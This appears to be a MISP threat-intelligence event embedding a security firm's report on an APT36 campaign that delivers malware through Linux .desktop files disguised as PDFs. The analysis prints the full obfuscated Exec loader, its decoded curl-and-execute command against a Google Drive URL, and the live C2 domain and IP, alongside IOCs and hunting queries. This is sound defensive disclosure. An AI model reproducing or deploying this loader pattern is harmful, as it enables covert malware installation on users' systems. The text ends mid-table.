{
  "Event": {
    "analysis": "2",
    "date": "2025-08-22",
    "extends_uuid": "",
    "info": "Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery",
    "publish_timestamp": "1755867015",
    "published": true,
    "threat_level_id": "4",
    "timestamp": "1755864522",
    "uuid": "957de389-e7a6-4e1b-87b3-a7b5e94d3c34",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#0087e8",
        "local": false,
        "name": "osint:certainty=\"50\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      },
      {
        "colour": "#13f000",
        "local": false,
        "name": "misp-galaxy:threat-actor=\"Operation C-Major\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Phishing - T1566\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Malicious File - T1204.002\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\"",
        "relationship_type": ""
      },
      {
        "colour": "#065100",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Windows Service - T1543.003\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Hidden Files and Directories - T1564.001\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Masquerading - T1036\"",
        "relationship_type": ""
      },
      {
        "colour": "#064d00",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Binary Padding - T1027.001\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Brute Force - T1110\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Software Discovery - T1518\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Application Layer Protocol - T1071\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Non-Application Layer Protocol - T1095\"",
        "relationship_type": ""
      },
      {
        "colour": "#064500",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Ingress Tool Transfer - T1105\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Non-Standard Port - T1571\"",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1755862813",
        "to_ids": true,
        "type": "domain",
        "uuid": "cfedc6a4-9723-4829-a1be-5c59ddaa5a7e",
        "value": "seemysitelive.store"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1755862813",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "b35b2435-f3bf-4c4e-8e8c-5cb67c503cfb",
        "value": "164.215.103.55"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1755862813",
        "to_ids": true,
        "type": "url",
        "uuid": "acc62ac7-6a55-43c2-a108-b1b21993a619",
        "value": "ws://seemysitelive.store:8080/ws"
      },
      {
        "category": "Network activity",
        "comment": "seemysitelive.store: Enriched via the dns module",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1755863479",
        "to_ids": false,
        "type": "ip-src",
        "uuid": "f0c6ed03-747c-4c67-aa4d-a50d59cd0f3d",
        "value": "45.155.54.28"
      }
    ],
    "Object": [
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1755862724",
        "uuid": "89853472-13c0-482d-ad1c-4c51b42dbac5",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1755862724",
            "to_ids": true,
            "type": "filename",
            "uuid": "458a764f-528b-48fc-8d2b-3004c236ced6",
            "value": "PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1755862724",
            "to_ids": true,
            "type": "md5",
            "uuid": "bc19cb01-79bd-4287-8978-760328b23748",
            "value": "6ac0fe0fa5d9af8193610d710a7da63c"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1755862724",
            "to_ids": true,
            "type": "sha1",
            "uuid": "f5f02cec-17d4-4bc8-a935-d2f8cdede6f4",
            "value": "3e3169c513c02126028480421fb341a167cb9fcd"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1755862724",
            "to_ids": true,
            "type": "sha256",
            "uuid": "bdf19bab-d0e4-4711-a30b-7b49b32ce0c9",
            "value": "34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1755862737",
        "uuid": "fe5c92c7-b606-413d-8a6a-d7dccc93337d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1755862737",
            "to_ids": true,
            "type": "filename",
            "uuid": "692a2d2a-f774-4a8a-b38a-09509c1557ae",
            "value": "PROCUREMENT_OF_MANPORTABLE_\\&_COMPAC.pdf.desktop"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1755862737",
            "to_ids": true,
            "type": "md5",
            "uuid": "3e92c2a5-fc7c-4764-9405-341081ac7484",
            "value": "a484f85d132609a4a6b5ed65ece7d331"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1755862737",
            "to_ids": true,
            "type": "sha1",
            "uuid": "e1285ccc-c3e2-440e-8985-d4bd6e6b8338",
            "value": "1982f09bfab3a6688bb80249a079db1a759214b7"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1755862737",
            "to_ids": true,
            "type": "sha256",
            "uuid": "24c0a784-9bac-4a4a-9f6f-fb0a853c9d4f",
            "value": "6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113"
          }
        ]
      },
      {
        "comment": "the dropped file (payload)",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1755862772",
        "uuid": "aad11a37-a73b-4433-b727-ce37c80c3ece",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1755862772",
            "to_ids": true,
            "type": "md5",
            "uuid": "95715e32-d083-43cd-a8b2-43b639bd6d69",
            "value": "566ddd4eb4ca8d4dd67b72ee7f944055"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1755862772",
            "to_ids": true,
            "type": "sha1",
            "uuid": "f3821dbe-5a84-49cf-99ae-0704cd561dc5",
            "value": "df4db969a69efc1db59f4d3c596ed590ee059777"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1755862772",
            "to_ids": true,
            "type": "sha256",
            "uuid": "d3d931d6-52eb-4326-8d81-ae424d12aa3d",
            "value": "7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b"
          }
        ]
      }
    ],
    "EventReport": [
      {
        "name": "Report from - https://www.cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery (1755862913)",
        "content": "# Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery\r\n\r\nPakistan-linked APT36 (Transparent Tribe) launched a new cyber-espionage campaign targeting Indian government and defense entities. Active in August 2025, the group used phishing ZIP files containing malicious Linux \u00e2\u0080\u009c.desktop\u00e2\u0080\u009d shortcuts that downloaded payloads from Google Drive. The malware created persistence, evaded detection, and connected to a WebSocket C2 server (seemysitelive[.]store). Investigators urge blocking the C2 domain, scanning for indicators of compromise, and tightening email and endpoint defenses.\r\n\r\nAyush Panwar\r\n\r\nAugust 21, 2025\r\n\r\nLast Update posted on\r\n\r\nAugust 22, 2025\r\n\r\n\r\n#### **Executive Summary**\r\n\r\nAPT36 also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major \u00e2\u0080\u0094 is a Pakistan-based advanced persistent threat (APT) group active since at least 2013. The group is primarily focused on cyber-espionage activities targeting Indian government entities, with a particular emphasis on defense personnel and related organizations. APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.\r\n\r\nIn our recent investigations, we observed a new infection technique leveraging Linux desktop entry (.desktop) files as a malware delivery mechanism. The attack begins with a malicious ZIP archive containing a .desktop file disguised as a document (e.g., *PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.desktop*). When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings. The malware then:\r\n\r\n1. Decodes the hex payload and writes it to /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-$(date +%s) (where date +%s provides a Unix timestamp).\r\n2. Adjusts permissions and executes the dropper binary.\r\n3. Opens a decoy PDF file in Firefox, creating the impression that a legitimate document has been accessed to reduce victim suspicion.\r\n\r\nOnce launched, the dropper performs several operations:\r\n\r\n* Executes anti-debugging and anti-sandbox checks.\r\n* Establishes persistence on the infected system.\r\n* Attempts to establish a connection with its command-and-control (C2) infrastructure using WebSockets.\r\n\r\n#### \u00e2\u0080\u008d\r\n\r\n#### **Analysis**\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.zip** : Zip file contains .desktop malware file\r\n\r\n**MD5 Hash :** 6ac0fe0fa5d9af8193610d710a7da63c\r\n\r\n**SHA1 Hash :** 3e3169c513c02126028480421fb341a167cb9fcd\r\n\r\n**SHA256 Hash :** 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d\r\n\r\n\u00e2\u0080\u008d\r\n\r\nAfter Unziping the zip file we get a .desktop file (**PROCUREMENT\\_OF\\_MANPORTABLE\\_\\&\\_COMPAC.pdf.desktop**)\r\n\r\n**MD5 Hash :** a484f85d132609a4a6b5ed65ece7d331\r\n\r\n**SHA1 Hash :** 1982f09bfab3a6688bb80249a079db1a759214b7\r\n\r\n**SHA256 Hash :** 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113\r\n\r\n\u00e2\u0080\u008d\r\n\r\nA .desktop file is a plain text configuration file used primarily in Linux desktop environments to define application shortcuts and launchers. It provides metadata about an application, such as its name, icon, and the command to execute the program. These files allow an application to appear in system menus, on the desktop, or in panels, facilitating easy launching from graphical user interfaces.\r\n\r\n\u00e2\u0080\u008d\r\n\r\nFig 1 : .desktop file with pdf icon impersonating a real pdf file\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\u00e2\u0080\u008d\r\n\r\nThe malicious code is concealed within the icon configuration.\r\n\r\nFig 2 : Code Stored in .desktop file\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Analysis for .desktop file**\r\n\r\n1. **Embedded Icon Data**\r\n\r\n# --- BEGIN EMBEDDED ICON DATA ---  \r\n# iVBORw0KGgqd1AvKicUBc7GuHI7XQwdKi/HWYzY53AMg1uzySt9pcU8vjp35LwaNYUW9Oqdg9oIc  \r\n# ... (Base64-encoded image data) ...  \r\n# --- END EMBEDDED ICON DATA ---\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* These lines contain an embedded icon image encoded in Base64 format.\r\n* This icon is used by the Linux desktop environment to visually represent the .desktop file.\r\n* Embedding the icon data helps disguise the file as a legitimate PDF document shortcut.\r\n* The malware hides itself \"between\" or alongside the icon data to avoid casual detection.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n2. **\u00c2\u00a0[Desktop Entry] Header**\r\n\r\n[Desktop Entry]\r\n\r\n* Marks the beginning of the desktop entry configuration as per the Desktop Entry Specification.\r\n* Indicates this file defines how the desktop environment should treat this item (e.g., application shortcut).\r\n\r\n\u00e2\u0080\u008d\r\n\r\n3. **Name Field**\r\n\r\nName=PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf\r\n\r\n* The displayed name of this shortcut, designed to look like a legitimate PDF file.\r\n* Using a plausible document name helps trick users into double-clicking.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n4. **Exec Field**\r\n\r\nExec=bash -c 'CTFuFt=\"/tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-$(date +%s)\"; niLThe=\"$(echo ZWFNWEpXPSItLWZhaWwgLS1sb2NhdGlvbiAtLXNob3ctZXJyb3IiOyBjdXJsICR7ZWFNWEpXfSAiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVlFRaVR0NzhOM0twWUp6VmJFLTk1dUlMbk84NFd6Xy0iIHwgeHhkIC1yIC1w | base64 -d)\"; eval \"$niLThe\" > \"$CTFuFt\" && chmod +x \"$CTFuFt\" && \"$CTFuFt\" & iuqdST=\"$(echo ZmlyZWZveCAtLW5ldy13aW5kb3cgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS9maWxlL2QvMWtuMExfNldZYmZVVXgwZG16d2ZBTERuemtWSEpBUFR1L3ZpZXc/dXNwPWRyaXZlX2xpbmsi | base64 -d)\"; eval \"$iuqdST\" &'\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* This is the core malware execution command that runs when the .desktop file is executed.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Breakdown:**\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* CTFuFt is a variable set to a file path in /tmp/ with the original PDF name appended by a Unix timestamp to create a unique filename.\r\n\r\n* niLThe is set by decoding a base64-encoded string, which is a hex-encoded payload. i.e niLThe stores the following command\r\n\r\ncurl --fail --location --show-error \"https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz\\_-\" | xxd -r -p\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* This decoded payload is written to the file path $CTFuFt (/tmp dir).\r\n\r\n* The file is then given execute permissions (chmod +x).\r\n\r\n* The payload file is executed in the background (&).\r\n\r\n* Another base64-decoded command is stored in iuqdST which launches Firefox, opening a decoy PDF URL to mislead the user.\r\n\r\nfirefox --new-window \"https://drive.google.com/file/d/1kn0L\\_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive\\_link\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* Both payload execution and decoy PDF opening happen concurrently.\r\n\r\n* Essentially, this runs a hidden malicious payload while showing a fake legitimate document to the victim.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n5. **Terminal Field**\r\n\r\nTerminal=false\r\n\r\n* Indicates that the command should run without opening a visible terminal window.\r\n\r\n* Helps hide the attack execution from user view.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n6. **Type Field**\r\n\r\nType=Application\r\n\r\n* Identifies this .desktop file as an application launcher.\r\n* This field tells the system that executing this file will run an application or command rather than opening a folder or link.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n7. **Icon Field**\r\n\r\nIcon=application-pdf\r\n\r\n* Specifies the icon that the desktop environment should display for this file.\r\n* Set to a generic PDF icon to further disguise the file as a document rather than an executable.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n8. **Categories Field**\r\n\r\nCategories=Utility;\r\n\r\n* Used by the desktop environment to categorize the application.\r\n* Here, it is marked as a utility, presumably to avoid suspicion.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n9. **X-GNOME-Autostart-enabled Field**\r\n\r\nX-GNOME-Autostart-enabled=true\r\n\r\n* GNOME-specific key that marks this file to be automatically started when the user logs in.\r\n* This could be an attempt to establish persistence by running the malicious .desktop file on every session start.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n10. **X-AppImage-Integrate Field**\r\n\r\nX-AppImage-Integrate=false\r\n\r\n* Prevents AppImage integration, a Linux feature related to portable apps.\r\n* Likely irrelevant for malware but included to maintain expected desktop file structure.\r\n\r\n11. **Second Embedded Icon Data Block**\r\n\r\n# --- BEGIN EMBEDDED ICON DATA ---  \r\n# iVBORw0KGgqkmDCyTlAPgMnafl2BLX+gyT9xeiQFmRad7Yp+eSZ18TseFE3GYswghqPWxLb2pEjg  \r\n# ... (Base64-encoded image data) ...  \r\n# --- END EMBEDDED ICON DATA ---\r\n\r\n* Another Base64-encoded icon embedded again at the end, perhaps to maintain file integrity or repel simpler detection.\r\n* This reinforces the disguise by embedding multiple icon images.\r\n\r\n\u00e2\u0080\u008d\r\n\r\nFig 3 : Snapshot of the decoy pdf\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Analysis for the dropped file (payload)**\r\n\r\nPayload file : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=508a3568c56ed4f613cfafef23ff12c81ba627eb, with debug\\_info, not stripped\r\n\r\nWith section header analysis we can confirm this is a go binary.\r\n\r\n**MD5 Hash :** 566ddd4eb4ca8d4dd67b72ee7f944055\r\n\r\n**SHA1 Hash :** df4db969a69efc1db59f4d3c596ed590ee059777\r\n\r\n**SHA256 Hash :** 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b\r\n\r\n\u00e2\u0080\u008d\r\n\r\nReverse Engineering the go binary gives some interesting findings:\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**1. Go Runtime & Stack Growth**\r\n\r\n* This is Go\u00e2\u0080\u0099s way of checking if there's enough stack space and growing the goroutine stack when needed.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**2. Randomization & Anti\u00e2\u0080\u0091Analysis Checks**\r\n\r\n* It seeds randomness with the current time.\r\n\r\n* Runs \"dummy evasion checks\" in a loop \u00e2\u0080\u0094 these are anti\u00e2\u0080\u0091debug / anti\u00e2\u0080\u0091sandbox routines designed to waste time or detect instrumentation.\r\n\r\n* Typical malware trick to throw off emulators and static analyzers.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**3. Client Creation**\r\n\r\n* This function seems to build a network \"client\" object for later use.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**4. Stealth / Persistence Modes**\r\n\r\nIt branches based on os.Args:\r\n\r\nIf os.Args == \"--hidden\", it triggers:\r\n\r\n(stealth install mode)\r\n\r\n\u00e2\u0080\u008d\r\n\r\nOtherwise, it installs persistence (likely adding itself to cron and backup daemon):\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**5. Logging & Announcements**\r\n\r\nThere are many calls to:\r\n\r\nlog.(\\*Logger).output(...)  \r\nmain.main.Println.funcX  \r\nmain.main.Printf.funcY\r\n\r\nWhere it logs messages like:\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\"Stealth client starting\u00e2\u0080\u00a6\"\r\n\r\n\"(PID: ...)\"  \r\n\"Attempting to connect to server: ...\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**6. Command & Control Behavior**\r\n\r\nThe loop at the end is critical:\r\n\r\n* That Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws)\r\n* The client continually tries to connect to it.\r\n* If the connection fails, it logs then sleeps and retries \u00e2\u0080\u0094 classic C2 (Command & Control) beaconing loop.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**7. Syscall Usage**\r\n\r\n* This is either doing low\u00e2\u0080\u0091level process manipulation (possibly hiding, persistence, or privilege escalation).\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Attribution**\r\n\r\nThe C2 we found was running a websocket which returned \u00e2\u0080\u009cWelcome to Stealth Server\u00e2\u0080\u009d. Let\u00e2\u0080\u0099s check the C2 on Censys to identify if we can gather any \u00e2\u0080\u009cStealth Server\u00e2\u0080\u009d related artifacts.\r\n\r\nFig 4. Censys Query results\r\n\r\n\u00e2\u0080\u008d\r\n\r\nSearched for IP addresses using the following Censys query:\r\n\r\nservices.http.response.html\\_tags:\"<title>Stealth Server - Login</title>\"\r\n\r\nResults:\r\n\r\n* 4 IPs matched the query.\r\n* 3 of these were identified as malicious:\r\n* 2 are our C2 servers.\r\n* 1 is a previously attributed C2 associated with APT36.\r\n\r\nC2 domain: seemysitelive[.]store\u00c2\r\n\r\nC2 IP:\u00c2\u00a0 164.215.103.55 (related to ASN: AS 213373 ;\u00c2\u00a0 IP Connect Inc )\r\n\r\nConnecting to websocket give : \"Welcome to Stealth Server\"\r\n\r\n*Fig 5. Virustotal results for the domain*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n*Fig 6. Response from the websocket*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\u00e2\u0080\u008d\r\n\r\n*Diamond model for APT36*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Impact**\r\n\r\nThe use of google drive in their attack lifecycle represents a significant evolution in the threat group's capabilities, introducing spearphishing vectors that pose higher risks to Linux-based government and defense infrastructure.\u00c2\r\n\r\n**Impact on Enterprises and Governments**\r\n\r\n**Targeted Espionage on Critical Sectors:** APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.\r\n\r\n**Stealthy Persistence and Evasion:** Using disguised .desktop files and sophisticated anti-debugging/anti-sandbox techniques, the malware persists undetected on Linux systems, allowing prolonged unauthorized access and espionage.\r\n\r\n**Supply Chain and Procurement Security Threat:** The campaign uses procurement-themed phishing to infiltrate organizations, highlighting vulnerabilities in procurement workflows which can lead to operational disruption, fraud, and loss of trust.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Command & Control Over Non-Standard Protocols:** Utilizing WebSocket communications on port 8080, the campaign maintains stealthy remote control and exfiltration capabilities, complicating detection and incident response efforts.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Indicators of Compromise (IOCs)\u00c2**\r\n\r\n**File Hashes**\r\n\r\nMalicious ZIP Archive  \r\nFilename: PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.zip  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 6ac0fe0fa5d9af8193610d710a7da63c  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 3e3169c513c02126028480421fb341a167cb9fcd  \r\nSHA256: \u00c2\u00a0 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d\r\n\r\nMalicious .desktop File  \r\nFilename: PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.desktop  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 a484f85d132609a4a6b5ed65ece7d331  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 1982f09bfab3a6688bb80249a079db1a759214b7  \r\nSHA256: \u00c2\u00a0 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113\r\n\r\nGo Binary Payload  \r\nFilename: ELF 64-bit LSB executable (dropped payload)  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 566ddd4eb4ca8d4dd67b72ee7f944055  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 df4db969a69efc1db59f4d3c596ed590ee059777  \r\nSHA256: \u00c2\u00a0 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Network Indicators**\r\n\r\nCommand & Control Infrastructure\r\n\r\nDomain: \u00c2\u00a0 seemysitelive[.]store  \r\nIP: \u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 164.215.103.55  \r\nASN:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 AS 213373 (IP Connect Inc)  \r\nProtocol: WebSocket (ws://)  \r\nPort: \u00c2\u00a0 \u00c2\u00a0 8080  \r\nURL:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 ws://seemysitelive[.]store:8080/ws  \r\nBanner: \u00c2\u00a0 \"Welcome to Stealth Server\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Payload Delivery Infrastructure**\r\n\r\nPlatform: Google Drive\r\n\r\nAttacker Gmail : [email\u00a0protected]  \r\nURL Pattern: https://drive.google.com/uc?export=download&id=[FILE\\_ID]  \r\nDecoy URL: https://drive.google.com/file/d/1kn0L\\_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive\\_link\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**File System Artifacts**\r\n\r\nPayload Drop Locations  \r\nPath Pattern: /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-[TIMESTAMP]  \r\nExample:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-1692547200  \r\nPermissions:\u00c2\u00a0 Executable (chmod +x applied)\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Behavioral Indicators**\r\n\r\nProcess Execution Patterns  \r\nCommand: bash -c [BASE64\\_ENCODED\\_COMMANDS]  \r\nPattern: curl --fail --location --show-error [GOOGLE\\_DRIVE\\_URL] | xxd -r -p  \r\nProcess: Firefox launch with decoy PDF URL  \r\nBinary:\u00c2\u00a0 Go executable with anti-debugging features\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Network Communication Patterns**\r\n\r\nProtocol: \u00c2\u00a0 \u00c2\u00a0 WebSocket connections to port 8080  \r\nRetry Logic:\u00c2\u00a0 10-second intervals on connection failure  \r\nUser-Agent: \u00c2\u00a0 Go HTTP client patterns  \r\nPersistence:\u00c2\u00a0 Continuous reconnection attempts\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Remediation Recommendations**\r\n\r\n**Network Security**\r\n\r\n* Block C2 Infrastructure\r\n* Add seemysitelive[.]store and 164.215.103.55 to network blocklists\r\n* Monitor and block WebSocket connections to port 8080\r\n* Implement DNS sinkholing for the malicious domain\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Endpoint Detection**\r\n\r\n* Search for file hashes across all Linux systems\r\n* Hunt for files in /tmp/ matching the naming pattern\r\n* Identify systems with suspicious .desktop files\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Email Security**\r\n\r\n* Block ZIP attachments containing .desktop files\r\n* Implement additional scanning for procurement-themed emails\r\n* Review email logs for similar attachment patterns\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Hunt Operations**\r\n\r\n1. Threat Hunting Queries\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\r\n\r\n# Search for suspicious .desktop files  \r\n \u00c2\u00a0 find / -name \"\\*.desktop\" -newer [recent\\_date] -exec grep -l \"bash -c\" {} \\;  \r\n \u00c2\u00a0   \r\n \u00c2\u00a0 # Look for hex-decoded payloads  \r\n \u00c2\u00a0 grep -r \"xxd -r -p\" /var/log/  \r\n \u00c2\u00a0   \r\n \u00c2\u00a0 # Find Go binaries in suspicious locations  \r\n \u00c2\u00a0 find /tmp /var/tmp -type f -executable -exec file {} \\; | grep \"Go building\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n2. Memory Analysis\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Dump memory of suspicious Go processes\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Analyze WebSocket connections in memory\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Check for embedded configuration data\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Appendix**\r\n\r\n## ATT&CK Tactics and Techniques\r\n\r\n| ATT&CK Tactic | ATT&CK Technique ID | Technique Name | Description / Relevance |\r\n| --- | --- | --- | --- |\r\n| Initial Access | T1566 | Phishing | Delivery via phishing ZIP attachments containing malicious .desktop files |\r\n| Execution | T1204.002 | User Execution: Malicious File | Execution of disguised .desktop files by users |\r\n| T1064 | Scripting | Use of bash script commands in the .desktop Exec field to download payload |\r\n| Persistence | T1543.003 | Create or Modify System Process: Systemd Service | Persistence via autostart .desktop files and likely cron/systemd services 